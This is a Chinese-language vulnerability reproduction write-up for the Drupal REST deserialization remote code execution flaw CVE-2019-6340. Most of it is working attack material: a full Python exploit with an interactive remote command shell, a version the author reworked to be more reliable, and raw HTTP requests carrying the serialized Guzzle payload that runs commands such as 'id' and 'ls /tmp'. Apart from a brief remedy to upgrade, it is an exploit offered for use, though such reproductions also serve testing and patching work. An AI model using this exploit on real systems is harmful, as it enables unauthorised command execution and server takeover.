高危
1、漏洞介绍
Drupal官方之前更新了一个非常关键的安全补丁,修复了因为接受的反序列化数据过滤不够严格,在开启REST的Web服务拓展模块的情况下,可能导致PHP代码执行的严重安全。
根据官方公告和自身实践,8.6.x或(<8.6.10)两种情况可能导致问题出现:
RESTful Web Services拓展开启,并且启用了REST资源(默认配置即可),不需要区分GET,POST等方法即可完成攻击。
JSON:API服务模块开启,此服务尚未分析。
2、影响版本
Drupal 8.6.x < 8.6.10 Drupal 8.5.x(或更早版本) < 8.5.11
3、漏洞复现
直接运行python脚本poc即可
import requests import sys import re if len(sys.argv)!=2: print('+---------------------------------------------------------------+') print('+ DES: by zhzyker as https://github.com/zhzyker/exphub +') print('+ https://freeerror.org/d/488 +') print('+---------------------------------------------------------------+') print('+ USE: python3 <filename> <url> +') print('+ EXP: python3 cve-2019-6340_cmd.py http://freeerror.org:8080 +') print('+ VER: Drupal < 8.6.10 +') print('+ Drupal < 8.5.12 +') print('+---------------------------------------------------------------+') sys.exit() url = sys.argv[1] cmd = "whoami" dir = "/node/?_format=hal_json" url_dir = url + dir cmd_len = len(cmd) payload = "{\r\n \"link\": [\r\n {\r\n \"value\": \"link\",\r\n \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\r\n }\r\n ],\r\n \"_links\": {\r\n \"type\": {\r\n \"href\": \"%s/rest/type/shortcut/default\"\r\n }\r\n }\r\n}" % (cmd_len,cmd,url) headers = { 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", 'Connection': "close", 'Content-Type': "application/hal+json", 'Accept': "*/*", 'Cache-Control': "no-cache" } response = requests.request("POST", url_dir, data=payload, headers=headers) if response.status_code==403 and "u0027access" in response.text : print ("[+] Find Drupal CVE-2019-6340 Vuln!\n") else: print ("[-] Not Drupal CVE-2019-6340 Vuln! Good Luck~\n") sys.exit() def do_post(cmd): payload = "{\r\n \"link\": [\r\n {\r\n \"value\": \"link\",\r\n \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\r\n }\r\n ],\r\n \"_links\": {\r\n \"type\": {\r\n \"href\": \"%s/rest/type/shortcut/default\"\r\n }\r\n }\r\n}" % (cmd_len,cmd,url) headers = { 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", 'Connection': "close", 'Content-Type': "application/hal+json", 'Accept': "*/*", 'Cache-Control': "no-cache" } global response response = requests.request("POST", url_dir, data=payload, headers=headers) r = response.text s = r.split("}")[1] print (s) while 1: cmd = input("Shell >>> ") cmd_len = len(cmd) if cmd == "exit" : exit(0) do_post(cmd)
或者
漏洞利用地址:
exphub/cve-2019-6340_cmd.py at master · zhzyker/exphub · GitHub
网上找的POC用了一下,说实话,没一个能用的,可能是因为使用场景不同,因此个人对POC进行了简单修改
总结错误原因:
其实很简单,有两点
第一点:
url = sys.argv[1]
dir = "/node/?_format=hal_json"
url_dir = url + dir
一般而言,我们在输入网址时,会出现如下情况
url = http://123.58.236.76:23001/
那么url_dir = http://123.58.236.76:23001//node/?_format=hal_json
其中有 // 对于脚本request请求时,容易发生406错误而导致无法获取内容
第二点:
与第一点类似
\"href\": \"%s/rest/type/shortcut/default\"\r\n
当 url代入时,会出现 http://123.58.236.76:23001//rest/type/shortcut/default
因而导致无法正确进行
原因同上
对POC进行小优化
解决了输入网址的问题:
以上POC在输入时要求 url 必须为 http:// 形式,优化后可以只输入域名即可
如:
对比:
原:
python poc.py http://123.58.236.76:23001/
小优化后:
python poc.py http://123.58.236.76:23001
python poc.py 123.58.236.76:23001
注意:
无论原POC或者小优化后的POC,都不可输入https://,否则会出现错误
import requests import sys import re if len(sys.argv)!=2: print('+---------------------------------------------------------------+') print('+ DES: by zhzyker as https://github.com/zhzyker/exphub +') print('+ https://freeerror.org/d/488 +') print('+---------------------------------------------------------------+') print('+ USE: python3 <filename> <url> +') print('+ EXP: python3 cve-2019-6340_cmd.py http://freeerror.org:8080 +') print('+ VER: Drupal < 8.6.10 +') print('+ Drupal < 8.5.12 +') print('+---------------------------------------------------------------+') sys.exit() url = sys.argv[1] if str(sys.argv[1][0]) != 'h': url = 'http://' + url if sys.argv[1][len(sys.argv[1]) - 1] != '/': url += '/' cmd = "whoami" dir = "node/?_format=hal_json" url_dir = url + dir cmd_len = len(cmd) payload = "{\r\n \"link\": [\r\n {\r\n \"value\": \"link\",\r\n \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\r\n }\r\n ],\r\n \"_links\": {\r\n \"type\": {\r\n \"href\": \"%srest/type/shortcut/default\"\r\n }\r\n }\r\n}" % (cmd_len,cmd,url) headers = { 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", 'Connection': "close", 'Content-Type': "application/hal+json", 'Accept': "*/*", 'Cache-Control': "no-cache" } response = requests.request("POST", url_dir, data=payload, headers=headers) if response.status_code==403 and "u0027access" in response.text : print ("[+] Find Drupal CVE-2019-6340 Vuln!\n") else: print ("[-] Not Drupal CVE-2019-6340 Vuln! Good Luck~\n") sys.exit() def do_post(cmd): payload = "{\r\n \"link\": [\r\n {\r\n \"value\": \"link\",\r\n \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\r\n }\r\n ],\r\n \"_links\": {\r\n \"type\": {\r\n \"href\": \"%srest/type/shortcut/default\"\r\n }\r\n }\r\n}" % (cmd_len,cmd,url) headers = { 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", 'Connection': "close", 'Content-Type': "application/hal+json", 'Accept': "*/*", 'Cache-Control': "no-cache" } global response response = requests.request("POST", url_dir, data=payload, headers=headers) r = response.text s = r.split("}")[1] print (s) while 1: cmd = input("Shell >>> ") cmd_len = len(cmd) if cmd == "exit" : exit(0) do_post(cmd)
或者
访问漏洞环境并用burp抓包,将数据包改为如下payload,并发送
POST /node/?_format=hal_json HTTP/1.1 Host: <漏洞环境的IP:PORT> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 Connection: keep-alive Content-Type: application/hal+json Accept: */* Cache-Control: no-cache Content-Length: 636 { "link": [ { "value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" } ], "_links": { "type": { "href": "<漏洞环境的IP:PORT>/rest/type/shortcut/default" } } }
4、修复建议
升级到最新版
参考
Drupal RCE(CVE-2019-6340)复现踩坑_痴人说梦梦中人的博客-CSDN博客_drupal rce
【CVE-2019-6340】Drupal 8.x REST RCE 远程执行代码漏洞复现_Jaoing的博客-CSDN博客_drupal远程代码执行漏洞复现
示例
1
cmd -->
Python poc1.py http://123.58.236.76:10309/
[-] Not Drupal CVE-2019-6340 Vuln! Good Luck~
2
burp抓包
修改为
POST /node/?_format=hal_json HTTP/1.0 Host: 123.58.236.76:23001 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: application/hal+json Cache-Control: no-cache Content-Length: 593 { "link":[ { "value":"link", "options":"O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:7:\"ls /tmp\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" } ], "_links":{ "type":{ "href":"http://123.58.236.76:23001/rest/type/shortcut/default" } } }
其中注意点
POST /node/?_format=hal_json Content-Type: application/hal+json /rest/type/shortcut/default 123.58.236.76:23001 s:7:\"ls /tmp\" 其中7随着"内容进行改变 http://123.58.236.76:23001/rest/type/shortcut/default 此处23001/rest需要注意,很可能写成23001//rest